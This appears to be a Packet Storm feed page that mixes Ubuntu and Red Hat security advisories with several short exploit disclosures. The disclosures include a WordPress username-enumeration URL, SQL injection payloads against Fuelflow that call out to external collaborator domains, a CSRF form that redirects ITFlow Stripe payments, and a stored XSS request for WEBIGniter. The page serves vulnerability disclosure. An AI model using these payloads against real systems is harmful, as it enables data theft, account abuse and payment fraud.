Ubuntu Security Notice 6584-2 - USN-6584-1 fixed several vulnerabilities in Ubuntu 18.04 LTS and Ubuntu 20.04 LTS. This update provides the corresponding updates for CVE-2021-33912 andCVE-2021-33913 in Ubuntu 16.04 LTS. Philipp Jeitner and Haya Shulman discovered that Libspf2 incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to cause a denial of service or execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6584-2  
February 21, 2024

libspf2 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in Libspf2.

Software Description:  
- libspf2: Sender Policy Framework for SMTP authorization

Details:

USN-6584-1 fixed several vulnerabilities in Ubuntu 18.04 LTS and  
Ubuntu 20.04 LTS. This update provides the corresponding updates for  
CVE-2021-33912 and CVE-2021-33913 in Ubuntu 16.04 LTS.

We apologize for the inconvenience.

Original advisory details:

  Philipp Jeitner and Haya Shulman discovered that Libspf2 incorrectly handled  
  certain inputs. If a user or an automated system were tricked into opening a  
  specially crafted input file, a remote attacker could possibly use this issue  
  to cause a denial of service or execute arbitrary code. (CVE-2021-20314)

  It was discovered that Libspf2 incorrectly handled certain inputs. If a user or  
  an automated system were tricked into opening a specially crafted input file, a  
  remote attacker could possibly use this issue to cause a denial of service or  
  execute arbitrary code. This issue only affected Ubuntu 18.04 LTS and  
  Ubuntu 20.04 LTS. (CVE-2021-33912, CVE-2021-33913)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   libmail-spf-xs-perl             1.2.10-6ubuntu0.1~esm2  
   libspf2-2                       1.2.10-6ubuntu0.1~esm2  
   libspf2-dev                     1.2.10-6ubuntu0.1~esm2  
   spfquery                        1.2.10-6ubuntu0.1~esm2

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6584-2  
   https://ubuntu.com/security/notices/USN-6584-1  
   CVE-2021-33912, CVE-2021-33913

Ubuntu Security Notice USN-6584-2

WordPress versions 6.4.3 and below appear to suffer from a REST API related username disclosure vulnerability.

    # Title: wordpress 6.4.3 - Username Disclosure# Author: h4shur# date:2024-02-21# Vendor Homepage: https://www.wordpress.org# Software Link: https://www.wordpress.org/download# Version:  6.4.3 and earlier# Tested on: Windows 10 & Google Chrome# Category : Web Application Bugs### Description :the REST API allows simulating different request types. As such, we canperform a POST request with the “users” string in the body of the request,and tell the REST API to act like it’s received a GET request.You can see the management username in the "slug" feature. And evensecurity plugins like "iThemes Security" do not block this path.### POC :https://target.com/wp-json/?rest_route=/wp/v2/users/# output :[{"id":1,"name":"admin","url":"https:\/\/target.com","description":"","link":"https:\/\/target.com\/?author=1","slug":"admin_1l","avatar_urls":{"24":"https:\/\/secure.gravatar.com\/avatar\/f796ffd8af7172647b2f54ce8104919e?s=24&d=mm&r=g","48":"https:\/\/secure.gravatar.com\/avatar\/f796ffd8af7172647b2f54ce8104919e?s=48&d=mm&r=g","96":"https:\/\/secure.gravatar.com\/avatar\/f796ffd8af7172647b2f54ce8104919e?s=96&d=mm&r=g"},"meta":[],"_links":{"self":[{"href":"https:\/\/target.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"collection":[{"href":"https:\/\/target.com\/index.php?rest_route=\/wp\/v2\/users"}]}}]### Admin Panel :https://target.com/wp-adminhttps://target.com/login.php### contact :h4shursec@gmail.comtwitter.com/h4shurinstagram.com/h4shurt.me/h4shur

WordPress 6.4.3 Username Disclosure

Fuelflow version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: fuelflow-1.0-Copyright-©-2024-Project-Develop-by-Mayuri-K-Multiple-SQLi## Author: nu11secur1ty## Date: 02/21/24## Vendor: https://www.mayurik.com/## Software: https://www.mayurik.com/source-code/P3584/best-petrol-pump-management-software## Reference: https://portswigger.net/web-security/sql-injection## Description:The email parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.tupaputka.com\\xvb'))+'was submitted in the email parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed. The attacker can receive very sensitive informationabout this system by using these vulnerabilities!STATUS: HIGH-Vulnerability[+]Payload:```mysql---Parameter: email (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause    Payload: email=-5782' OR 2852=2852 OR'nYvi'='GjbH&password=h3I!y3o!F9&submit=    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: email=mOsqQatz@burpcollaborator.net'+(selectload_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.oastify.com\\xvb'))+''AND (SELECT 9621 FROM(SELECT COUNT(*),CONCAT(0x7178706271,(SELECT(ELT(9621=9621,1))),0x7178787671,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) OR'BiVP'='cVHj&password=h3I!y3o!F9&submit=    Type: stacked queries    Title: MySQL >= 5.0.12 stacked queries (comment)    Payload: email=mOsqQatz@burpcollaborator.net'+(selectload_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.oastify.com\\xvb'))+'';SELECTSLEEP(7)#&password=h3I!y3o!F9&submit=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: email=mOsqQatz@burpcollaborator.net'+(selectload_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.oastify.com\\xvb'))+''AND (SELECT 3257 FROM (SELECT(SLEEP(7)))QSTs) OR'Lshu'='MGpY&password=h3I!y3o!F9&submit=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2024/fuelflow-1.0-Copyright-%C2%A9-2024-Project-Develop-by-Mayuri-K-Multiple-SQLi)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/02/fuelflow-10-copyright-2024-project.html)## Time spent:00:35:00

Fuelflow 1.0 SQL Injection

Ubuntu Security Notice 6645-1 - It was discovered that the netfilter connection tracker for netlink in the Linux kernel did not properly perform reference counting in some error conditions. A local attacker could possibly use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6645-1February 20, 2024linux vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 14.04 LTS (Available with Ubuntu Pro)Summary:The system could be made to stop responding under certain conditions.Software Description:- linux: Linux kernelDetails:It was discovered that the netfilter connection tracker for netlink in theLinux kernel did not properly perform reference counting in some errorconditions. A local attacker could possibly use this to cause a denial ofservice (memory exhaustion).Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 14.04 LTS (Available with Ubuntu Pro):   linux-image-3.13.0-196-generic  3.13.0-196.247   linux-image-3.13.0-196-lowlatency  3.13.0-196.247   linux-image-generic             3.13.0.196.206   linux-image-generic-lts-trusty  3.13.0.196.206   linux-image-lowlatency          3.13.0.196.206   linux-image-server              3.13.0.196.206   linux-image-virtual             3.13.0.196.206After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6645-1   CVE-2023-7192

Ubuntu Security Notice USN-6645-1

ITFlow versions prior to commit 432488eca3998c5be6b6b9e8f8ba01f54bc12378 suffer from a cross site request forgery vulnerability.

    # CVE: CVE-2024-25344# CWE: CWE-352# Vendor: ITFlow.org# Affected product: ITFlow - Before commit 432488eca3998c5be6b6b9e8f8ba01f54bc12378# Discoverer: stehled, WP-Pomoc.cz# Attack-Type: Remote# AV: Admin user has to open a page, provided by an attacker, which will then perform malicious request changing system settings.Open source ITFlow was vulnerable to CSRF prior commit 432488eca3998c5be6b6b9e8f8ba01f54bc12378This vulnerability allowed an attacker to change system settings such as online payment information and Microsoft Azure SSO credentials.If admin user is logged in, we can, using provided PoC redirect him to post.php endpoint and make changes to the system. PoC below makes changes to Stripe related settings, which will lead to attacker receiving payments made through the system.<html><form enctype="multipart/form-data" method="POST" action="https://demo.itflow.org/post.php">    <table>        <tr><td>edit_online_payment_settings</td><td><input type="text" value="" name="edit_online_payment_settings"></td></tr>        <tr><td>config_stripe_enable</td><td><input type="text" value="1" name="config_stripe_enable"></td></tr>        <tr><td>config_stripe_publishable</td><td><input type="text" value="csrf-poc" name="config_stripe_publishable"></td></tr>        <tr><td>config_stripe_secret</td><td><input type="text" value="csrf-poc-secret" name="config_stripe_secret"></td></tr>        <tr><td>config_stripe_account</td><td><input type="text" value="1" name="config_stripe_account"></td></tr>    </table>    <input type="submit" value="https://demo.itflow.org/post.php"></form></html># Referencehttps://itflow.org/https://github.com/itflow-org/itflow/commit/432488eca3998c5be6b6b9e8f8ba01f54bc12378https://github.com/itflow-org/itflow/commit/8068cb6081e4760860a634c1066b2c64d0ee2d46

ITFlow Cross Site Request Forgery

This paper will walk you through the proof-of-concept and technical details of exploitation for IOActive's recent NFC relay attack on the newest Tesla vehicle, the Model Y. To successfully carry out the attack, IOActive reverse-engineered the NFC protocol Tesla uses between the NFC card and the vehicle, and they then created custom firmware modifications that allowed a Proxmark RDV4.0 device to relay NFC communications over Bluetooth/Wi-Fi using the Proxmark's BlueShark module.

NFC Relay Attack On Tesla Model Y

Red Hat Security Advisory 2024-0930-03 - An update for kernel is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include integer overflow, null pointer, out of bounds access, privilege escalation, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0930.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel security update  
Advisory ID:        RHSA-2024:0930-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0930  
Issue date:         2024-02-21  
Revision:           03  
CVE Names:          CVE-2021-33655  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: GSM multiplexing race condition leads to privilege escalation (CVE-2023-6546)

* kernel: malicious data for FBIOPUT_VSCREENINFO ioctl may cause OOB write memory (CVE-2021-33655)

* kernel: KVM: nVMX: missing IBPB when exiting from nested guest can lead to Spectre v2 attacks (CVE-2022-2196)

* kernel: media: em28xx: initialize refcount before kref_get (CVE-2022-3239)

* kernel: use-after-free after failed devlink reload in devlink_param_get (CVE-2022-3625)

* kernel: net/packet: slab-out-of-bounds access in packet_recvmsg() (CVE-2022-20368)

* hw: cpu: arm64: Spectre-BHB (CVE-2022-23960)

* kernel: use-after-free due to improper update of reference count in net/sched/cls_u32.c (CVE-2022-29581)

* kernel: vmwgfx: integer overflow in vmwgfx_execbuf.c (CVE-2022-36402)

* kernel: vmwgfx: NULL pointer dereference in vmw_cmd_dx_define_query (CVE-2022-38096)

* kernel: vmwgfx: use-after-free in vmw_cmd_res_check (CVE-2022-38457)

* kernel: vmwgfx: use-after-free in vmw_execbuf_tie_context (CVE-2022-40133)

* kernel: sctp: fail if no bound addresses can be used for a given scope (CVE-2023-1074)

* kernel: Out of boundary write in perf_read_group() as result of overflow a perf_event's read_size (CVE-2023-6931)

* kernel: KVM: nVMX: missing consistency checks for CR0 and CR4 (CVE-2023-30456)

* kernel: blocking operation in dvb_frontend_get_event and wait_event_interruptible (CVE-2023-31084)

* kernel: use-after-free in amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c (CVE-2023-51042)

* kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function (CVE-2024-1086)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2021-33655

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2062284  
https://bugzilla.redhat.com/show_bug.cgi?id=2088021  
https://bugzilla.redhat.com/show_bug.cgi?id=2108691  
https://bugzilla.redhat.com/show_bug.cgi?id=2123695  
https://bugzilla.redhat.com/show_bug.cgi?id=2127985  
https://bugzilla.redhat.com/show_bug.cgi?id=2133451  
https://bugzilla.redhat.com/show_bug.cgi?id=2133452  
https://bugzilla.redhat.com/show_bug.cgi?id=2133453  
https://bugzilla.redhat.com/show_bug.cgi?id=2133455  
https://bugzilla.redhat.com/show_bug.cgi?id=2144720  
https://bugzilla.redhat.com/show_bug.cgi?id=2160023  
https://bugzilla.redhat.com/show_bug.cgi?id=2173430  
https://bugzilla.redhat.com/show_bug.cgi?id=2188468  
https://bugzilla.redhat.com/show_bug.cgi?id=2213139  
https://bugzilla.redhat.com/show_bug.cgi?id=2252731  
https://bugzilla.redhat.com/show_bug.cgi?id=2255498  
https://bugzilla.redhat.com/show_bug.cgi?id=2259866  
https://bugzilla.redhat.com/show_bug.cgi?id=2262126

Red Hat Security Advisory 2024-0930-03

Red Hat Security Advisory 2024-0845-03 - Red Hat OpenShift Container Platform release 4.13.34 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include denial of service and traversal vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0845.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Critical: OpenShift Container Platform 4.13.34 security update  
Advisory ID:        RHSA-2024:0845-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0845  
Issue date:         2024-02-21  
Revision:           03  
CVE Names:          CVE-2023-49568  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.13.34 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.13.

Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.  
Security Fix(es):

* go-git: Maliciously crafted Git server replies can lead to path traversal  
and RCE on go-git clients (CVE-2023-49569)  
* go-git: Maliciously crafted Git server replies can cause DoS on go-git  
clients (CVE-2023-49568)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s)  
listed in the References section.

Solution:

https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags

https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

CVEs:

CVE-2023-49568

References:

https://access.redhat.com/security/updates/classification/#critical  
https://bugzilla.redhat.com/show_bug.cgi?id=2258143  
https://bugzilla.redhat.com/show_bug.cgi?id=2258165  
https://issues.redhat.com/browse/OCPBUGS-28740  
https://issues.redhat.com/browse/OCPBUGS-28899  
https://issues.redhat.com/browse/OCPBUGS-29190  
https://issues.redhat.com/browse/OCPBUGS-29243  
https://issues.redhat.com/browse/OCPBUGS-29301

Red Hat Security Advisory 2024-0845-03

WEBIGniter version 28.7.23 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WEBIGniter v28.7.23 Stored Cross Site Scripting (XSS)# Exploit Author: Sagar Banwa# Date: 19/10/2023# Vendor: https://webigniter.net/# Software: https://webigniter.net/demo# Reference: https://portswigger.net/web-security/cross-site-scripting# Tested on: Windows 10/Kali Linux# CVE : CVE-2023-46391Stored Cross-site scripting(XSS):Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.Steps-To-Reproduce:1. Login to the Account 2. Go to the Categories.3. Now add catagory > Name section use payload : "><script>alert(1)</script> and choose layoutfile as cat.phpRequest POST /cms/categories/add HTTP/2Host: demo.webigniter.netCookie: ci_session=iq8k2mjlp2dg4pqa42m3v3dn2d4lmtjb; hash=6ROmvkMoHKviB4zypWJXmjIv6vhTQlFw6bdHlRjXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 94Origin: https://demo.webigniter.netReferer: https://demo.webigniter.net/cms/categories/addUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersname=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&slug=scriptalert1script&layout_file=cat.php

WEBIGniter 28.7.23 Cross Site Scripting

Red Hat Security Advisory 2024-0837-03 - Red Hat OpenShift Container Platform release 4.14.13 is now available with updates to packages and images that fix several bugs and add enhancements.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0837.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.14.13 security update  
Advisory ID:        RHSA-2024:0837-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0837  
Issue date:         2024-02-20  
Revision:           03  
CVE Names:          CVE-2023-39325  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.14.13 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.14.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.  
Security Fix(es):

* golang: net/http, x/net/http2: rapid stream resets can cause excessive  
work (CVE-2023-44487) (CVE-2023-39325)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s)  
listed in the References section.

Solution:

https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags

https://docs.openshift.com/container-platform/4.14/updating/updating_a_cluster/updating-cluster-cli.html

https://docs.openshift.com/container-platform/4.14/release_notes/ocp-4-14-release-notes.html

CVEs:

CVE-2023-39325

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003  
https://bugzilla.redhat.com/show_bug.cgi?id=2243296  
https://issues.redhat.com/browse/OCPBUGS-22270  
https://issues.redhat.com/browse/OCPBUGS-26072  
https://issues.redhat.com/browse/OCPBUGS-29100  
https://issues.redhat.com/browse/OCPBUGS-29182  
https://issues.redhat.com/browse/OCPBUGS-29187  
https://issues.redhat.com/browse/OCPBUGS-29206  
https://issues.redhat.com/browse/OCPBUGS-29207  
https://issues.redhat.com/browse/OCPBUGS-29239  
https://issues.redhat.com/browse/OCPBUGS-29300  
https://issues.redhat.com/browse/OCPBUGS-29431

Source

Packet Storm